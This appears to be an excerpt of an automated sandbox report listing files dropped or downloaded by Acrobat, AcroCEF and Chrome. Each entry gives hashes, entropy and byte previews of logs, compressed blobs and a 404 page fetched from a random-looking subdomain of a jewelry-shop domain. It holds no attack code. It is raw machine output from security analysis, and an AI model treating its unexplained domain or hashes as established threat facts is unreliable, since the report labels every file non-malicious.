                                                                                        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):246
                                                                                        Entropy (8bit):3.51161293806784
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8cZgr:Qw946cPbiOxDlbYnuRKHer
                                                                                        MD5:F9891899289F6EB6BBA2EB8014A461C0
                                                                                        SHA1:F85F572C77E9B841C98A70F415452409A3E6B759
                                                                                        SHA-256:88C4D6CCF682C039817975ACA3DBB6A6CD531923F6D13A3A0887113995E16994
                                                                                        SHA-512:272FF2DF0F95EDF371D89A64E265014964592DB9509F4A0A82676E3A19A32022527E3C8C3B01FF5A3718CD044BB8E2BAAC68D446D64C8D910F151A84ADC1092D
                                                                                        Malicious:false
                                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.4./.1.2./.2.0.2.4. . .0.3.:.1.7.:.2.8. .=.=.=.....
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with very long lines (393)
                                                                                        Category:dropped
                                                                                        Size (bytes):16525
                                                                                        Entropy (8bit):5.345946398610936
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                                        MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                                        SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                                        SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                                        SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                                        Malicious:false
                                                                                        Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):15114
                                                                                        Entropy (8bit):5.326289941392616
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:0YCt6Ybh2ziwBoeCQwmXb9Obvwldlthyj0b8ZMnjBFDCLrwzwdQOZVEVUdUOaKNl:amSX
                                                                                        MD5:BE46356E96BEC639D328272C4C50773E
                                                                                        SHA1:B43819A27CD0F25920858B02B06F12B7DB87FA62
                                                                                        SHA-256:A41F6076E5FEE49A2B403AB25FF9D4C588E21E8DBC5D3DF4B6283938CE21CB66
                                                                                        SHA-512:21C081853DB71A2AA1B596D4F6D2D0DC20D59BE709A78789C84C941BD84CCF2A7BB38CB172493633C890746B89899BF1A0C65522C61AA394809D9E762CCCFEA1
                                                                                        Malicious:false
                                                                                        Preview:SessionID=18ce12d8-4fb7-4ebf-be3c-8222639e952d.1735028240047 Timestamp=2024-12-24T03:17:20:047-0500 ThreadID=4208 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=18ce12d8-4fb7-4ebf-be3c-8222639e952d.1735028240047 Timestamp=2024-12-24T03:17:20:048-0500 ThreadID=4208 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=18ce12d8-4fb7-4ebf-be3c-8222639e952d.1735028240047 Timestamp=2024-12-24T03:17:20:048-0500 ThreadID=4208 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=18ce12d8-4fb7-4ebf-be3c-8222639e952d.1735028240047 Timestamp=2024-12-24T03:17:20:048-0500 ThreadID=4208 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=18ce12d8-4fb7-4ebf-be3c-8222639e952d.1735028240047 Timestamp=2024-12-24T03:17:20:048-0500 ThreadID=4208 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):29752
                                                                                        Entropy (8bit):5.386641302112726
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rN:CbbfovafS2E
                                                                                        MD5:D9D9417C9EC15DEF16B16CFBD6B6676F
                                                                                        SHA1:799627F774AD5AD99AB93859D87A33ACC89BC8B1
                                                                                        SHA-256:DB2B2431F95BBD8C9B87752B0EC7DADF094B70DC62A6AEB197C5F9E77D38AB88
                                                                                        SHA-512:D60C8C9D5C8DDF665BCAA8F3C42624965D9D0447393B3C37B3319B8F3471B77DAD884A8D1B65D303F79DBB548A6C6FFBE29C029480B8461664808F17CF1DEB28
                                                                                        Malicious:false
                                                                                        Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                        Category:dropped
                                                                                        Size (bytes):684206
                                                                                        Entropy (8bit):7.978753154520273
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:/xnA8qZEjJ6keS7uK33MALWGZwBMjZbZsYxeoJF4vNamTkdake:/xA7owWLaGZDwYIGNPJe
                                                                                        MD5:C330C69C35D254FFE33CF6AA010E50A5
                                                                                        SHA1:B0AD6C6A6C09A07D217216DB2969D28523033E46
                                                                                        SHA-256:0495D836DE06D4274218E99AE60BDCD04DF28C267686ED0A1CD1A95B99A00C27
                                                                                        SHA-512:5F84AE982C96654CA80519DCAE63A3E1C56C8BC303942C822A2FDE712C63BE1C1495C99AB5F254AF896A8935ACEEB9EF5A3F41CC466B0CB53251977C9F6BB946
                                                                                        Malicious:false
                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                        Category:dropped
                                                                                        Size (bytes):758601
                                                                                        Entropy (8bit):7.98639316555857
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                        MD5:3A49135134665364308390AC398006F1
                                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                        Malicious:false
                                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                        Category:dropped
                                                                                        Size (bytes):386528
                                                                                        Entropy (8bit):7.9736851559892425
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                        Malicious:false
                                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                        Category:dropped
                                                                                        Size (bytes):386528
                                                                                        Entropy (8bit):7.9736851559892425
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                        Malicious:false
                                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                        Category:dropped
                                                                                        Size (bytes):386528
                                                                                        Entropy (8bit):7.9736851559892425
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                        Malicious:false
                                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                        Category:dropped
                                                                                        Size (bytes):758601
                                                                                        Entropy (8bit):7.98639316555857
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                        MD5:3A49135134665364308390AC398006F1
                                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                        Malicious:false
                                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                                                        Category:dropped
                                                                                        Size (bytes):1407294
                                                                                        Entropy (8bit):7.97605879016224
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:/YkwYIGNPQbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZd:DwZG2b3mlind9i4ufFXpAXkrfUs0qWLk
                                                                                        MD5:38ED8E7B44D526DDA0F3E7608AF1AFA1
                                                                                        SHA1:45E30A6789382E29AC870CCF92B514FB95742C45
                                                                                        SHA-256:7B277E2332AE55A014D8C37CCC879D165E33315437F6197BEB153CD75E4EFBBF
                                                                                        SHA-512:7169B1E4B2895A91FA0FBE4297CB70BE56D733084653334BB4E8421382F8F761DAD11B5D87277E0286A7C16CB53A2C79F96BB45F433D776E82A7CF45EA25121C
                                                                                        Malicious:false
                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                        Category:dropped
                                                                                        Size (bytes):758601
                                                                                        Entropy (8bit):7.98639316555857
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                        MD5:3A49135134665364308390AC398006F1
                                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                        Malicious:false
                                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):3.990210155325004
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                        Malicious:false
                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with very long lines (358)
                                                                                        Category:downloaded
                                                                                        Size (bytes):11816
                                                                                        Entropy (8bit):5.037139572888145
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:bpvXn2H25Zx48DNYGu6C9tdDOxktft1zQOPtaUrzvHlPuPQXGuV27BHplXtAUU/s:FvX2H25v4CYn6etFTBvhtv4IcpRtlU/s
                                                                                        MD5:A8063BD37D3C8FB3176A6BF140558A4D
                                                                                        SHA1:E32CF4B407DB3D3773DED13FF64B70FDBAD7735F
                                                                                        SHA-256:BCCB23D41C2CC69CF0C7D22C4314CA8181A513C6999B73E45307792830F4E482
                                                                                        SHA-512:82D749F6B17B21587FB345CA196A2AA83ECA80AD66ED9C1AB88B36709BED14175D53AFEFE9ACC0DAFC4FAD78FFB8DF155193A6829BC857AD6D68B1C84AF7B854
                                                                                        Malicious:false
                                                                                        URL:https://5m9sp7.naomijewelryjapan.com/favicon.ico
                                                                                        Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">.<head profile="http://gmpg.org/xfn/11">. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <title>404 - PAGE NOT FOUND</title>...... Add Slide Outs -->.....<script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> .....<script src="/cgi-sys/js/simple-expand.min.js"></script>. . <style type="text/css">. body{padding:0;margin:0;font-family:helvetica;}. #container{margin:20px auto;width:868px;}. #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;}. #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;}. #container #mid404 #gatorbottom{position:relative;left:39px;float:left;}. #
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                        Category:dropped
                                                                                        Size (bytes):89501
                                                                                        Entropy (8bit):5.289893677458563
                                                                                        Encrypted:false
